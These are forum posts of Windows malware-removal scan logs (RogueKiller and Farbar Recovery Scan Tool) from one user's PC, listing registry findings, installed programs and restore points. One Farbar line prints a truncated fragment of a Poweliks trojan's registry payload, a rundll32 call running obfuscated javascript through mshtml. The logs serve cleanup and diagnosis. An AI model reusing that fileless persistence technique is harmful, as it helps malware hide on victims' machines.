Jump to content

rampantfox83

Members
 View Profile  See their activity

  • Posts

    5

  • Joined

  • Last visited

 Content Type 

Everything posted by rampantfox83

  1. rampantfox83
    RogueKiller V10.0.5.0 (x64) [Nov 11 2014] by Adlice Software mail : http://www.adlice.com/contact/ Feedback : http://forum.adlice.com Website : http://www.adlice.com/softwares/roguekiller/ Blog : http://www.adlice.com Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version Started in : Normal mode User : Swintal [Administrator] Mode : Scan -- Date : 11/11/2014 21:54:42 ¤¤¤ Processes : 2 ¤¤¤ [Proc.Injected] ekrn.exe -- [x] -> Killed [DrvNtTerm] [Proc.Injected] dllhost.exe -- [x] -> Killed [TermProc] ¤¤¤ Registry : 15 ¤¤¤ [suspicious.Path] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Run | Google+ Auto Backup : "C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe" /autostart -> Found [suspicious.Path] (X86) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Run | Google+ Auto Backup : "C:\Users\Swintal\AppData\Local\Programs\Google\Google+ Auto Backup\Google+ Auto Backup.exe" /autostart -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{46F98522-0B7E-4616-8783-34B23EF7FE3A} | DhcpNameServer : 209.18.47.61 209.18.47.62 [uNITED STATES (US)][uNITED STATES (US)] -> Found [PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found [PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0 -> Found [PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found [PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found [PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1 -> Found [PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1 -> Found [Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-4134620719-2527629264-1752102789-1000\Software\classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32 -> Found ¤¤¤ Tasks : 0 ¤¤¤ ¤¤¤ Files : 0 ¤¤¤ ¤¤¤ Hosts File : 0 ¤¤¤ ¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤ ¤¤¤ Web browsers : 0 ¤¤¤ ¤¤¤ MBR Check : ¤¤¤ +++++ PhysicalDrive0: +++++ --- User --- [MBR] dd024e018e30dfaad67172ee7859e3c8 [bSP] 7c67bdb6eea5fc037f2fb1fde4966781 : Windows Vista/7/8 MBR Code Partition table: 0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB 1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 953767 MB User = LL1 ... OK User = LL2 ... OK +++++ PhysicalDrive1: +++++ --- User --- [MBR] 617240ae40078ba5b2d63715af595c39 [bSP] 130a6938a2838fcaeb361cefc3bc8c6d : Windows Vista/7/8 MBR Code Partition table: 0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB User = LL1 ... OK User = LL2 ... OK
  2. rampantfox83
    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 10-11-2014 Ran by Swintal at 2014-11-11 21:38:57 Running from C:\Users\Swintal\Desktop Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: ESET Smart Security 8.0 (Enabled - Up to date) {19259FAE-8396-A113-46DB-15B0E7DFA289} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: ESET Smart Security 8.0 (Enabled - Up to date) {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834} FW: ESET Personal firewall (Enabled) {211E1E8B-C9F9-A04B-6D84-BC85190CE5F2} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) A2A C172 Trainer for FSX (HKLM-x32\...\A2A C172 Trainer for FSX) (Version: - ) ACARS - 1 (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\2acd65cafe4fafc9) (Version: 2.21.0.22 - United Virtual Airlines) ACARS (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\ca11877970cf2b3f) (Version: 2.0.0.48 - United Virtual Airlines) Active Sky Next for FSX SP1B (HKLM-x32\...\{F1AE1E08-5094-46AD-AA4D-670C482723B2}_is1) (Version: 1.0.5410.16208 - HiFi Technologies, Inc.) Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.223 - Adobe Systems Incorporated) Adobe Reader X (10.1.12) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.12 - Adobe Systems Incorporated) Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.2.0.3 - Aerosoft) Aerosoft's - Airbus A318-A319 - FSX (HKLM-x32\...\Airbus A318-A319 - FSX) (Version: 1.10 - Aerosoft) Aerosoft's - Airbus A320-A321 - FSX (HKLM-x32\...\Airbus A320-A321 - FSX) (Version: 1.00 - Aerosoft) Aerosoft's - Anchorage X - FSX (HKLM-x32\...\Anchorage X - FSX) (Version: - ) Aerosoft's - Mega Airport Dublin - FSX (HKLM-x32\...\Mega Airport Dublin - FSX) (Version: 1.10 - Aerosoft) Aerosoft's - Mega Airport Duesseldorf - FSX (HKLM-x32\...\Mega Airport Duesseldorf - FSX) (Version: - ) aerosoft's - Mega Airport Frankfurt X (HKLM-x32\...\{BAEE0C24-C8C2-4820-9DF4-887909F1A286}) (Version: 1.04 - aerosoft) Aerosoft's - Mega Airport London Heathrow Xtended - FSX (HKLM-x32\...\Mega Airport London Heathrow Xtended - FSX) (Version: 1.00 - Aerosoft) ANT Drivers Installer x64 (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.) Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.) ASConnect for FSX Installer (HKLM-x32\...\{7E1270D4-42C4-49A4-9EC4-3300D2E47331}_is1) (Version: 1.0.5410.16224 - HiFi Technologies, Inc.) Asmedia ASM106x SATA Host Controller Driver (HKLM-x32\...\{61942EF5-2CD8-47D4-869C-2E9A8BB085F1}) (Version: 1.3.4.001 - Asmedia Technology) B1900D HD SERIES FSX/P3D (HKLM-x32\...\B1900D HD SERIES FSX/P3D) (Version: 1.00.00.00 - Carenado) Black ICE 6.21r2945 (HKLM-x32\...\{015E0577-7D4A-456C-A435-DD9EE7E72589}_is1) (Version: 6.21r2945 - Panzeroo, Inc.) bluCARS (HKLM-x32\...\{BD892214-8231-4910-8DBB-F277EE572B15}) (Version: 1.0.1014 - FS Products) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) CANON iMAGE GATEWAY MyCamera Download Plugin (HKLM-x32\...\MyCamera Download Plugin) (Version: 3.1.1.2 - Canon Inc.) CANON iMAGE GATEWAY Task for ZoomBrowser EX (HKLM-x32\...\CANON iMAGE GATEWAY Task) (Version: 1.9.0.9 - Canon Inc.) Canon MOV Decoder (HKLM-x32\...\Canon MOV Decoder) (Version: 1.8.0.7 - Canon Inc.) Canon MOV Encoder (HKLM-x32\...\Canon MOV Encoder) (Version: 1.6.0.1 - Canon Inc.) Canon MovieEdit Task for ZoomBrowser EX (HKLM-x32\...\MovieEditTask) (Version: 3.7.0.4 - Canon Inc.) Canon Utilities Digital Photo Professional 3.10 (HKLM-x32\...\DPP) (Version: 3.10.2.0 - Canon Inc.) Canon Utilities EOS Utility (HKLM-x32\...\EOS Utility) (Version: 2.10.2.0 - Canon Inc.) Canon Utilities EOS Video Snapshot Task for ZoomBrowser EX (HKLM-x32\...\EOS Video Snapshot Task) (Version: 1.0.0.10 - Canon Inc.) Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.22.46 - Canon Inc.) Canon Utilities Picture Style Editor (HKLM-x32\...\Picture Style Editor) (Version: 1.9.0.0 - Canon Inc.) Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.7.0.24 - Canon Inc.) Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.5.0.9 - Canon Inc.) Cheat Engine 6.4 (HKLM-x32\...\Cheat Engine 6.4_is1) (Version: - Cheat Engine) D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden Elevated Installer (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden Empire: Total War (HKLM-x32\...\Steam App 10500) (Version: - The Creative Assembly) ESET Smart Security (HKLM\...\{C082CDB9-D173-4740-AE0E-C685E6F44850}) (Version: 8.0.304.0 - ESET, spol s r. o.) Flight Simulator X (HKLM-x32\...\RTMshadow_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version: - ) Flight Simulator X Service Pack 1 (HKLM-x32\...\SP1shadow_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version: - ) FlightBeam Denver FSX (HKLM-x32\...\FlightBeam Denver FSX_is1) (Version: 1.0 - FlightBeam.) FlightBeam San Francisco International FSX (HKLM-x32\...\FlightBeam San Francisco International FSX_is1) (Version: 2.1 - FlightBeam.) FlightBeam Washington Dulles FSX (HKLM-x32\...\FlightBeam Washington Dulles FSX_is1) (Version: 1.2.3 - FlightBeam.) FS Flight Keeper (HKLM-x32\...\{B7057895-A93D-44D6-B87A-D3C1FCF28E01}) (Version: 3.5.1 - Thomas Molitor & Aerosoft GmbH) FSDreamTeam Hawaiian Airports Volume 2 FSX (HKLM-x32\...\FSDreamTeam Hawaiian Airports Volume 2 FSX_is1) (Version: 1.5.1 - VIRTUALI Sagl) FSDreamTeam Honolulu International FSX (HKLM-x32\...\FSDreamTeam Honolulu International FSX_is1) (Version: 1.4 - VIRTUALI s.a.s.) FSDreamTeam Houston Intercontinental Airport FSX (HKLM-x32\...\FSDreamTeam Houston Intercontinental Airport FSX_is1) (Version: 1.0.2 - VIRTUALI Sagl) FSDreamTeam KJFK FSX (HKLM-x32\...\FSDreamTeam KJFK FSX_is1) (Version: 1.3 - VIRTUALI s.a.s.) FSDreamTeam Las Vegas McCarran FSX (HKLM-x32\...\FSDreamTeam Las Vegas McCarran FSX_is1) (Version: 1.3 - VIRTUALI s.a.s.) FSDreamTeam Los Angeles International FSX (HKLM-x32\...\FSDreamTeam Los Angeles International FSX_is1) (Version: 1.5 - VIRTUALI s.a.s.) FSDreamTeam OHareX FSX (HKLM-x32\...\FSDreamTeam OHareX FSX_is1) (Version: 2.3 - VIRTUALI s.a.s.) FSFDT FSCopilot (HKLM-x32\...\FSFDT FSCopilot) (Version: - ) FSFDT FSInn (HKLM-x32\...\FSFDT FSInn) (Version: - ) Galeao Intl Airport FSX Prepar3d 2.1 (HKLM-x32\...\sbgl2012fsx) (Version: 2.1 - TropicalSim) Garmin Express (HKLM-x32\...\{817c6bb8-ea2d-4e12-abbc-e33c3de43f64}) (Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Garmin Express (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden Garmin Express Tray (x32 Version: 3.2.16.0 - Garmin Ltd or its subsidiaries) Hidden Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries) Globe Cargo PIREP (HKLM-x32\...\{93E6FA87-33AD-429C-BE11-F947250FE3BA}) (Version: 3.0.1 - Globe Cargo Virtual Airlines) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 38.0.2125.111 - Google Inc.) Google Drive (HKLM-x32\...\{C60F3836-333A-4AE2-B526-CFDBA143A9BA}) (Version: 1.18.7821.2489 - Google, Inc.) Google Earth Plug-in (HKLM-x32\...\{4AB54F11-2F8C-11E3-B09F-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google) Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden Google+ Auto Backup (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Google+ Auto Backup) (Version: 1.0.26.151 - Google, Inc.) Hearts of Iron III (HKLM-x32\...\Steam App 25890) (Version: - Paradox Development Studio) HP ENVY 4500 series Basic Device Software (HKLM\...\{38A08516-1847-43E4-8076-9540B60EC43B}) (Version: 32.2.188.47710 - Hewlett-Packard Co.) HP ENVY 4500 series Help (HKLM-x32\...\{95BECC50-22B4-4FCA-8A2E-BF77713E6D3A}) (Version: 30.0.0 - Hewlett Packard) HP FWUpdateEDO2 (HKLM-x32\...\{415FA9AD-DA10-4ABE-97B6-5051D4795C90}) (Version: 1.2.0.0 - Hewlett-Packard) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) iCloud (HKLM\...\{2AAF09D5-4B3F-4975-B6A9-ECE2631FC942}) (Version: 4.0.5.20 - Apple Inc.) Intel® Network Connections 18.1.59.0 (HKLM\...\PROSetDX) (Version: 18.1.59.0 - Intel) Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation) iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.) Juniper Networks Host Checker (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Neoteris_Host_Checker) (Version: 7.1.0.20169 - Juniper Networks) Juniper Networks, Inc. Setup Client (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\Juniper_Setup_Client) (Version: 7.1.6.17115 - Juniper Networks, Inc.) MacroWorks 3.1 (HKLM-x32\...\MacroWorks 3.1) (Version: - PI Engineering) Majestic MJC8Q400 Version 1.008 (HKLM-x32\...\MJC8Q400) (Version: - ) Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation) Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation) Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation) Microsoft Flight Simulator X: Acceleration (HKLM-x32\...\FlightSim_{A9729B90-D37B-4A69-B66A-7436AC1F7274}) (Version: 10.0.61637.0 - Microsoft Game Studios) Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation) Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4659.1001 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft SQL Server Compact 3.5 SP1 English (HKLM-x32\...\{E59113EB-0285-4BFD-A37A-B79EAC6B8F4B}) (Version: 3.5.5692.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) Navigraph FMS Data Manager 1.0.11.0603 (HKLM-x32\...\{7E4D5716-374A-4DB6-90CF-D2AEB67362CE}_is1) (Version: 1.0.11.0603 - Navigraph) Navtech PBS (HKLM-x32\...\{3582DCD8-F0DF-4B2A-808A-2A67BEFEAFA0}) (Version: 14.5.5 - Navtech Inc) NVIDIA 3D Vision Controller Driver 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation) NVIDIA 3D Vision Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 340.52 - NVIDIA Corporation) NVIDIA GeForce Experience 2.1.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.1.4 - NVIDIA Corporation) NVIDIA Graphics Driver 340.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 340.52 - NVIDIA Corporation) NVIDIA HD Audio Driver 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation) NVIDIA PhysX System Software 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation) Office 15 Click-to-Run Extensibility Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden Office 15 Click-to-Run Licensing Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden Office 15 Click-to-Run Localization Component (Version: 15.0.4659.1001 - Microsoft Corporation) Hidden Origin (HKLM-x32\...\Origin) (Version: 9.4.6.2792 - Electronic Arts, Inc.) PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.7.3 - pdfforge) Photo Common (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Photo Gallery (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.) PMDG 737 6700 NGX RTM (HKLM-x32\...\{C7EE862A-D83D-4A9F-B746-CBDE39BD7001}) (Version: 1.00.3219 - PMDG Simulations, LLC.) PMDG 737 8900 NGX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.00.3219 - PMDG Simulations, LLC.) PMDG 747-400/400F for FSX (HKLM-x32\...\{EDCEE320-0FB3-4197-9F86-8C1CCF2278FB}) (Version: 2.10.0040 - Precision Manuals Development Group) PMDG 777-200LR/F Base Package FSX (HKLM-x32\...\{0F16340B-5B5B-4531-8D87-4952E3BCA6E6}) (Version: 1.10.6155 - PMDG Simulations, LLC.) PMDG 777-300ER Expansion (HKLM-x32\...\{E65EFDE6-0864-40BA-8DDF-E31F736D9000}) (Version: 1.10.6155 - PMDG Simulations, LLC.) PMDG744X_GE_LH (HKLM-x32\...\{20372FAA-3AF4-4B3D-9B1D-564CDEA5957C}) (Version: 1.00.0000 - Precision Manuals Development Group) PMDG744X_PW_UA2 (HKLM-x32\...\{2B5DDFFF-F347-489E-861D-98D02D00472D}) (Version: 1.10.0000 - Precision Manuals Development Group) PMDG744X_PW_UA3 (HKLM-x32\...\{EAB979F7-84A6-47B6-AB39-CA73A6EEAE69}) (Version: 1.00.0000 - Precision Manuals Development Group) Punta Cana X-Generation FSX v1.0 (HKLM-x32\...\tsimmdpcxx) (Version: - ) QualityWings Ultimate 757 Collection FSX (HKLM-x32\...\QualityWings Ultimate 757 Collection FSX_is1) (Version: 1.3.2 - QualityWings) QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.) RAAS Professional by FS2Crew (LOCKED) (HKLM-x32\...\RAAS Professional by FS2Crew (LOCKED)) (Version: - ) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6923 - Realtek Semiconductor Corp.) Rio Santos Dumont FSX P3D 1.1 (HKLM-x32\...\sbrjfsx) (Version: 1.1 - TropicalSim) RollerCoaster Tycoon 3: Platinum! (HKLM-x32\...\Steam App 2700) (Version: - Frontier) SHIELD Streaming (Version: 3.1.2000 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 16.13.65 - NVIDIA Corporation) Hidden SimCity™ (HKLM-x32\...\{F70FDE4B-8F86-4eb6-8C8E-636EC89F6419}) (Version: 2.0.0.0 - Electronic Arts) St Thomas TIST2010 2.0 (HKLM-x32\...\tist2010fsx) (Version: 2.0 - TropicalSim) Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation) The Political Machine 2012 (HKLM-x32\...\Steam App 211120) (Version: - Stardock Entertainment) Tocumen Intl', Panama City FSX 1.0 (HKLM-x32\...\tsimmptoxx) (Version: - ) TOPCAT 2.74 Beta 1 - Take-Off and Landing Performance Calculation Tool (HKLM-x32\...\TOPCAT) (Version: 2.74 Beta 1 - FSS GmbH) Train Simulator 2015 (HKLM-x32\...\Steam App 24010) (Version: - RailSimulator.com) Ultimate General: Gettysburg (HKLM-x32\...\Steam App 306660) (Version: - Game-Labs) UVACARS (HKLM-x32\...\{8FA014EE-A721-428F-89F7-82F7B82D4386}) (Version: 3.3.15 - United Virtual Airlines) VC_CRT_x64 (Version: 1.02.0000 - Intel Corporation) Hidden VIRTUALI Addon ManagerX FSX (HKLM-x32\...\VIRTUALI Addon ManagerX FSX_is1) (Version: 2.9.0.23 - VIRTUALI Sagl) vroute.info (HKU\S-1-5-21-4134620719-2527629264-1752102789-1000\...\ea913c639d7ea423) (Version: 1.1.1.3 - vroute) Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.) Windows Driver Package - Garmin (grmnusb) GARMIN Devices (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin) Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software) Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation) WinRAR 5.01 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) ZipGenius 6.3 (HKLM-x32\...\{EC3B598C-1151-4191-B5B4-A9072ADE6259}_is1) (Version: 6.3 - Wininizio.it Software) ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.) CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll No File CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? CustomCLSID: HKU\S-1-5-21-4134620719-2527629264-1752102789-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Swintal\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.) ==================== Restore Points ========================= 09-11-2014 22:24:34 Installed Navtech PBS 11-11-2014 12:28:51 Windows Update 11-11-2014 12:56:25 Installed DirectX 11-11-2014 16:30:13 Removed bluCARS 11-11-2014 16:32:59 Installed bluCARS 11-11-2014 19:52:02 Installed DirectX 11-11-2014 19:56:23 Removed Professional Flight Planner X 12-11-2014 02:12:03 Restore Operation ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {1CFCAE88-C488-4548-AEA2-F7CCD8E91383} - 